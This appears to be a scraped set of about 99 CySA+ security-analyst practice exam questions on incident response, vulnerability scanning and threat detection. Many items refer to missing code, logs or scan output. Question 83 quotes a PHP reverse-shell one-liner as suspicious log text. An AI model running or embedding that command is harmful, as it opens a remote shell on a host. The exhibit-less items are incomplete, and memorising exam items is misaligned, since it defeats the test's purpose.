1) An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed? a) Blocklisting b) Allowlisting c) Graylisting d) Webhooks 2) A security analyst at a company is reviewing an alert from the file integrity monitoring indicating a mismatch in the login. html file hash. After comparing the code with the previous version of the page source code, the analyst found the following code snippet added: Which of the following best describes the activity the analyst has observed? a) Obfuscated links b) Exfiltration c) Unauthorized changes d) Beaconing 3) Which of the following actions would an analyst most likely perform after an incident has been investigated? a) Risk assessment b) Root cause analysis c) Incident response plan d) Tabletop exercise 4) A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks? a) Block the attacks using firewall rules b) Deploy an IPS in the perimeter network c) Roll out a CDN d) Implement a load balancer 5) An analyst is reviewing system logs while threat hunting: Which of the following hosts should be investigated first? a) PC1 b) PC2 c) PC3 d) PC4 e) PC5 6) An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data? a) DLP b) NAC c) EDR d) NIDS 7) A regulated organization experienced a security breach that exposed a list of customer names with corresponding PII data. Which of the following is the best reason for developing the organization's communication plans? a) For the organization's public relations department to have a standard notification b) To ensure incidents are immediately reported to a regulatory agency c) To automate the notification to customers who were impacted by the breach d) To have approval from executive leadership on when communication should occur 8) Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the following authentication methods should the analyst use? a) MFA b) User and password c) PAM d) Key pair 9) A penetration tester is conducting a test on an organization's software development website. The penetration tester sends the following request to the web interface: Which of the following exploits is most likely being attempted? a) SQL injection b) Local file inclusion c) Cross-site scripting d) Directory traversal 10) Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of responsibility. These computers had critical sensitive information stored locally that needs to be recovered. The department manager advised all department employees to turn off their computers until the security team could be contacted about the issue. Which of the following is the first step the incident response staff members should take when they arrive? a) Turn on all systems, scan for infection, and back up data to a USB storage device. b) Identify and remove the software installed on the impacted systems in the department. c) Explain that malware cannot truly be removed and then reimage the devices. d) Log on to the impacted systems with an administrator account that has privileges to perform backups. e) Segment the entire department from the network and review each computer offline. 11) A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment. Which of the following must be considered to ensure the consultant does no harm to operations? a) Employing Nmap Scripting Engine scanning techniques b) Preserving the state of PLC ladder logic prior to scanning c) Using passive instead of active vulnerability scans d) Running scans during off-peak manufacturing hours 12) A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notifications according to company policy. Which of the following technologies was deployed? a) SIEM b) SOAR c) IPS d) CERT 13) Which of following would best mitigate the effects of a new ransomware attack that was not properly stopped by the company antivirus? a) Install a firewall. b) Implement vulnerability management. c) Deploy sandboxing. d) Update the application blocklist. 14) A Chief Information Security Officer wants to implement security by design, starting with the implementation of a security scanning method to identify vulnerabilities, including SQL injection, RFI, XSS, etc. Which of the following would most likely meet the requirement? a) Reverse engineering b) Known environment testing c) Dynamic application security testing d) Code debugging 15) A security analyst scans a host and generates the following output: Which of the following best describes the output? a) The host is unresponsive to the ICMP request. b) The host is running a vulnerable mail server. c) The host is allowing unsecured FTP connections. d) The host is vulnerable to web-based exploits. 16) The security team at a company, which was a recent target of ransomware, compiled a list of hosts that were identified as impacted and in scope for this incident. Based on the following host list: Which of the following systems was most pivotal to the threat actor in its distribution of the encryption binary via Group Policy? a) SQL01 b) WK10-Sales07 c) WK7-Plant01 d) DCEast01 e) HQAdmin9 17) After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASE to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve? a) SIEM ingestion logs are reduced by 20%. b) Phishing alerts drop by 20% c) False positive rates drop to 20%. d) The MTTR decreases by 20%. 18) Which of the following threat actors is most likely to target a company due to its questionable environmental policies? a) Hacktivist b) Organized crime c) Nation-state d) Lone wolf 19) A cybersecurity analyst is recording the following details: In which of the following documents is the analyst recording this information? a) Risk register b) Change control documentation c) Incident response playbook d) Incident response plan 20) A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurred by an issue? a) Trends b) Risk Score c) Mitigation d) Prioritization 21) While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following should be checked first? a) If appropriate logging levels are set b) NTP configuration on each system c) Behavioral correlation settings d) Data normalization rules 22) During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a WAF. Which of the following best represents the change to overall risk associated with this vulnerability? a) The risk would not change because network firewalls are in use b) The risk would decrease because RDP is blocked by the firewall c) The risk would decrease because a web application firewall is in place d) The risk would increase because the host is external facing 23) Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Choose two.) a) Performing dynamic application security testing b) Reviewing the code c) Fuzzing the application d) Debugging the code e) Implementing a coding standard f) Implementing IDS 24) A security analyst is trying to validate the results of a web application scan with Burp Suite. The security analyst performs the following: Which of the following vulnerabilities is the security analyst trying to validate? a) SQL injection b) LFI c) XSS d) CSRF 25) A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls and two-factor authentication. Which of the following does this most likely describe? a) System hardening b) Hybrid network architecture c) Continuous authorization d) Secure access service edge 26) A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented? a) Offline storage b) Evidence collection c) Integrity validation d) Legal hold 27) An analyst investigated a website and produced the following: Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website? a) nmap -sS -T4 -F insecure.org b) nmap -C insecure.org c) nmap -sV -T4 -F insecure.org d) nmap -A insecure.org 28) A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps? a) The NTP server is not configured on the host b) The cybersecurity analyst is looking at the wrong information c) The firewall is using UTC time d) The host with the logs is offline 29) A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack? a) Scan the employee's computer with virus and malware tools b) Review the actions taken by the employee and the email related to the event c) Contact human resources and recommend the termination of the employee d) Assign security awareness training to the employee involved in the incident 30) A security analyst has found the following suspicious DNS traffic while analyzing a packet capture: Which of the following attacks most likely occurred? a) DNS exfiltration b) DNS spoofing c) DNS zone transfer d) DNS poisoning 31) A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement? a) Corrective controls b) Compensating controls c) Operational controls d) Administrative controls 32) During the log analysis phase, the following suspicious command is detected: Which of the following is being attempted? a) Buffer overflow b) RCE c) ICMP tunneling d) Smurf attack 33) An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters? a) DKIM b) SPF c) SMTP d) DMARC 34) A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log sources will confirm the malware infection? a) XDR logs b) Firewall logs c) IDS logs d) MFA logs 35) Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents? a) To provide metrics and test continuity controls b) To verify the roles of the incident response team c) To provide recommendations for handling vulnerabilities d) To perform tests against implemented security controls 36) A security analyst has prepared a vulnerability scan that contains all of the company’s functional subnets. During the initial scan users reported that network printers began to print pages that contained unreadable text and icons. Which of the following should the analyst do to ensure this behavior does not occur during subsequent vulnerability scans? a) Perform non-credentialed scans b) Ignore embedded web server ports c) Create a tailored scan for the printer subnet d) Increase the threshold length of the scan timeout 37) A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: Which of the following vulnerability scanning methods should be used to best meet these requirements? a) Internal b) Agent c) Active d) Uncredentialed 38) An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed? a) RFI b) LFI c) CSRF d) XSS 39) Which of the following does "federation" most likely refer to within the context of identity and access management? a) Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional acces b) An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains c) Utilizing a combination of what you know who you are, and what you have to grant authentication to a user d) Correlating one's identity with the attributes and associated applications the user has access to 40) The Chief Information Security Officer for an organization recently received approval to install a new EDR solution. Following the installation, the number of alerts that require remediation by an analyst has tripled. Which of the following should the organization utilize to best centralize the workload for the internal security team? (Choose two.) a) SOAR b) SIEM c) MSP d) NGFW e) XDR f) DLP 41) Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources? a) Hacktivist threat b) Advanced persistent threat c) Unintentional insider threat d) Nation-state threat 42) A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware based on its telemetry? a) Cross-reference the signature with open-source threat intelligence. b) Configure the EDR to perform a full scan. c) Transfer the malware to a sandbox environment. d) Log in to the affected systems and run netstat. 43) A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause? a) A local red team member is enumerating the local RFC1918 segment to enumerate hosts b) A threat actor has a foothold on the network and is sending out control beacons c) An administrator executed a new database replication process without notifying the SOC d) An insider threat actor is running Responder on the local segment, creating traffic replication 44) After completing a review of network activity, the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which of the following is potentially occurring? a) Irregular peer-to-peer communication b) Rogue device on the network c) Abnormal OS process behavior d) Data exfiltration 45) A vulnerability scanner generates the following output: The company has a SLA for patching that requires time frames to be met for high risk vulnerabilities. Which of the following should the analyst prioritize first for remediation? a) Oracle JDK b) Cisco Webex c) Redis Server d) SSL Self-signed Certificate 46) A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take? a) Instruct the firewall engineer that a rule needs to be added to block this external server b) Escalate the event to an incident and notify the SOC manager of the activity c) Notify the incident response team that there is a DDoS attack occurring d) Identify the IP/hostname for the requests and look at the related activity 47) Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system application, or user base is affected by an uptime availability outage? a) Timeline b) Evidence c) Impact d) Scope 48) A security analyst needs to provide evidence of regular vulnerability scanning on the company's network for an auditing process. Which of the following is an example of a tool that can produce such evidence? a) OpenVAS b) Burp Suite c) Nmap d) Wireshark 49) A security analyst performs a vulnerability scan. Based on the metrics from the scan results, the analyst must prioritize which hosts to patch. The analyst runs the tool and receives the following output: Which of the following hosts should be patched first, based on the metrics? a) host01 b) host02 c) host03 d) host04 50) An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the best step for the security team to take to ensure compliance with the request? a) Publicly disclose the request to other vendors b) Notify the departments involved to preserve potentially relevant information c) Establish a chain of custody starting with the attorney's request d) Back up the mailboxes on the server and provide the attorney with a copy 51) A company has the following security requirements: • No public IPs • All data secured at rest • No insecure ports/protocols After a cloud scan is completed a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output: a) VM_PRD_DB b) VM_DEV_DB c) VM_DEV_Web02 d) VM_PRD_Web01 52) Which of the following best describes the actions taken by an organization after the resolution of an incident that addresses issues and reflects on the growth opportunities for future incidents? a) Lessons learned b) Scrum review c) Root cause analysis d) Regulatory compliance 53) An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward? a) Impact b) Vulnerability score c) Mean time to detect d) Isolation 54) To minimize the impact of a security incident, a cybersecurity analyst has configured audit settings in the organization’s cloud services. Which of the following security controls has the analyst configured? a) Preventive b) Corrective c) Directive d) Detective 55) A web developer reports the following error that appeared on a development server when testing a new application: Which of the following tools can be used to identify the application's point of failure? a) OpenVAS b) Angry IP scanner c) Immunity debugger d) Burp Suite 56) Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure environment? a) MOU b) NDA c) BIA d) SLA 57) A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue? a) Credentialed scan b) External scan c) Differential scan d) Network scan 58) An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the control was unable to detect an attack with nine failed logins. Which of the following best represents what occurred? a) False Positive b) True Negative c) False Negative d) True Positive 59) A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of following best fits the type of scanning activity requested? a) Uncredentialed scan b) Discovery scan c) Vulnerability scan d) Credentialed scan 60) Which of the following best describes the process of requiring remediation of a known threat within a given time frame? a) SLA b) MOU c) Best-effort patching d) Organizational governance 61) Which of the following risk management principles is accomplished by purchasing cyber insurance? a) Accept b) Avoid c) Mitigate d) Transfer 62) A recent audit of the vulnerability management program outlined the finding for increased awareness of secure coding practices. Which of the following would be best to address the finding? a) Establish quarterly SDLC training on the top vulnerabilities for developers b) Conduct a yearly inspection of the code repositories and provide the report to management. c) Hire an external penetration test of the network d) Deploy more vulnerability scanners for increased coverage 63) An organization has deployed a cloud-based storage system for shared data that is in phase two of the data life cycle. Which of the following controls should the security team ensure are addressed? (Choose two.) a) Data classification b) Data destruction c) Data loss prevention d) Encryption e) Backups f) Access controls 64) An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and the cause is traced back to the vulnerability scanner. Which of the following is the cause of this issue? a) The scanner is running without an agent installed. b) The scanner is running in active mode. c) The scanner is segmented improperly d) The scanner is configured with a scanning window 65) An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts? a) Set user account control protection to the most restrictive level on all devices b) Implement MFA requirements for all internal resources c) Harden systems by disabling or removing unnecessary services d) Implement controls to block execution of untrusted applications 66) A new zero-day vulnerability was released. A security analyst is prioritizing which systems should receive deployment of compensating controls deployment first. The systems have been grouped into the categories shown below: Which of the following groups should be prioritized for compensating controls? a) Group A b) Group B c) Group C d) Group D 67) A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around? a) OSSTMM b) Diamond Model of Intrusion Analysis c) OWASP d) MITRE ATT&CK 68) During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately? a) Shut down the server. b) Reimage the server. c) Quarantine the server. d) Update the OS to latest version. 69) An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business? a) Perform a tabletop drill based on previously identified incident scenarios. b) Simulate an incident by shutting down power to the primary data center. c) Migrate active workloads from the primary data center to the secondary location. d) Compare the current plan to lessons learned from previous incidents. 70) Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually? a) Deploy a database to aggregate the logging b) Configure the servers to forward logs to a SIEM c) Share the log directory on each server to allow local access. d) Automate the emailing of logs to the analysts. 71) Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement? a) Mean time to detect b) Mean time to respond c) Mean time to remediate d) Service-level agreement uptime 72) After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising? a) Transfer b) Accept c) Mitigate d) Avoid 73) A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next? a) Wipe the computer and reinstall software b) Shut down the email server and quarantine it from the network c) Acquire a bit-level image of the affected workstation d) Search for other mail users who have received the same file 74) The security analyst received the monthly vulnerability report. The following findings were included in the report: • Five of the systems only required a reboot to finalize the patch application  • Two of the servers are running outdated operating systems and cannot be patched  The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised? a) Compensating controls b) Due diligence c) Maintenance windows d) Passive discovery 75) The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company: Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users frequently click on malicious links sent via email? a) Vulnerability A b) Vulnerability B c) Vulnerability C d) Vulnerability D 76) An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the following steps is most important during the transition between the two analysts? a) Identify and discuss the lessons learned with the prior analyst. b) Accept all findings and continue to investigate the next item target. c) Review the steps that the previous analyst followed. d) Validate the root cause from the prior analyst. 77) A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information: Which of the following vulnerabilities should be prioritized for remediation? a) nessie.explosion b) vote.4p c) sweet.bike d) great.skills 78) A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. Which of the following would best address this issue? a) Increasing training and awareness for all staff b) Ensuring that malicious websites cannot be visited c) Blocking all scripts downloaded from the internet d) Disabling all staff members’ ability to run downloaded applications 79) The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its data. Which of the following did the CISO most likely select? a) PCI DSS b) COBIT c) ISO 27001 d) ITIL 80) A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following would be the most effective mitigating control to reduce the rate of success of this brute-force attack? a) Enabling a user account lockout after a limited number of failed attempts b) Installing a third-party remote access tool and disabling RDP on all devices c) Implementing a firewall block for the remote system's IP address d) Increasing the verbosity of log-on event auditing on all devices 81) An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and performs cleanup routines on its infected hosts, including deletion of initial dropper and removal of event log entries and prefetch files from the host. Which of the following data sources would most likely reveal evidence of the root cause? (Choose two). a) Creation time of dropper b) Registry artifacts c) EDR data d) Prefetch files e) File system metadata f) Sysmon event log 82) Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?   a) Log retention b) Log rotation c) Maximum log size d) Threshold value 83) While reviewing web server logs, a security analyst discovers the following suspicious line: php -r ’$socket=fsockopen("10.0.0.1", 1234); passthru ("/bin/sh -i <&3 >&3 2>&3");’ Which of the following is being attempted? a) A. Remote file inclusion b) B. Command injection c) C. Server-side request forgery d) D. Reverse shell 84) Which of the following should be updated after a lessons-learned review? a) Disaster recovery plan b) Business continuity plan c) Tabletop exercise d) Incident response plan 85) A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development? a) Perform static analyses using an integrated development environment b) Deploy compensating controls into the environment c) Implement server-side logging and automatic updates d) Conduct regular code reviews using OWASP best practices 86) An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst's investigation? a) OpenVAS b) Angry IP Scanner c) Wireshark d) Maltego 87) Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization's endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor's actions? a) Delivery b) Reconnaissance c) Exploitation d) Weaponization 88) An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration? a) CIS Benchmarks b) PCI DSS c) OWASP Top Ten d) ISO 27001 89) A security analyst reviews the following Arachni scan results for a web application that stores PII data: Which of the following should be remediated first? a) SQL injection b) RFI c) XSS d) Code injection 90) Which of the following stakeholders are most likely to receive a vulnerability scan report? (Choose two.) a) Executive management b) Law enforcement c) Marketing d) Legal e) Product owner f) Systems administration 91) Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage? a) Enrich the SIEM-ingested data to include all data required for triage b) Schedule a task to disable alerting when vulnerability scans are executing c) Filter all alarms in the SIEM with low seventy d) Add a SOAR rule to drop irrelevant and duplicated notifications 92) An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the following is the most likely cause? a) The finding is a false positive and should be ignored. b) A rollback had been executed on the instance. c) The vulnerability scanner was configured without credentials. d) The vulnerability management software needs to be updated. 93) A company has decided to expose several systems to the internet. The systems are currently available internally only. A security analyst is using a subset of CVSS3.1 exploitability metrics to prioritize the vulnerabilities that would be the most exploitable when the systems are exposed to the internet. The systems and the vulnerabilities are shown below: Which of the following systems should be prioritized for patching? a) A. brown b) B. grey c) C. blane d) D. sullivan 94) During an incident in which a user machine was compromised, an analyst recovered a binary file that potentially caused the exploitation. Which of the following techniques could be used for further analysis? a) Fuzzing b) Static analysis c) Sandboxing d) Packet capture 95) A leader on the vulnerability management team is trying to reduce the team's workload by automating some simple but time-consuming tasks. Which of the following activities should the team leader consider first? a) Assigning a custom recommendation for each finding b) Analyzing false positives c) Rendering an additional executive report d) Regularly checking agent communication with the central console 96) When undertaking a cloud migration of multiple SaaS applications, an organization's systems administrators struggled with the complexity of extending identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project? a) CASB b) SASE c) ZTNA d) SWG 97) A security analyst reviews the following extract of a vulnerability scan that was performed against the web server: Which of the following recommendations should the security analyst provide to harden the web server? a) A. Remove the version information on http-server-header. b) B. Disable tcp_wrappers. c) C. Delete the /wp-login.php folder. d) D. Close port 22. 98) A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst should properly document the incident? a) Back up the configuration file for all network devices. b) Record and validate each connection. c) Create a full diagram of the network infrastructure. d) Take photos of the impacted items. 99) A cybersecurity analyst is participating with the DLP project team to classify the organization's data. Which of the following is the primary purpose for classifying data? a) To identify regulatory compliance requirements b) To facilitate the creation of DLP rules c) To prioritize IT expenses d) To establish the value of data to the organization

CySA Exam Topics 126 - 226

door
Embedden

Scorebord

Visuele stijl

Opties

Template wisselen

Automatisch opgeslagen activiteit "" herstellen?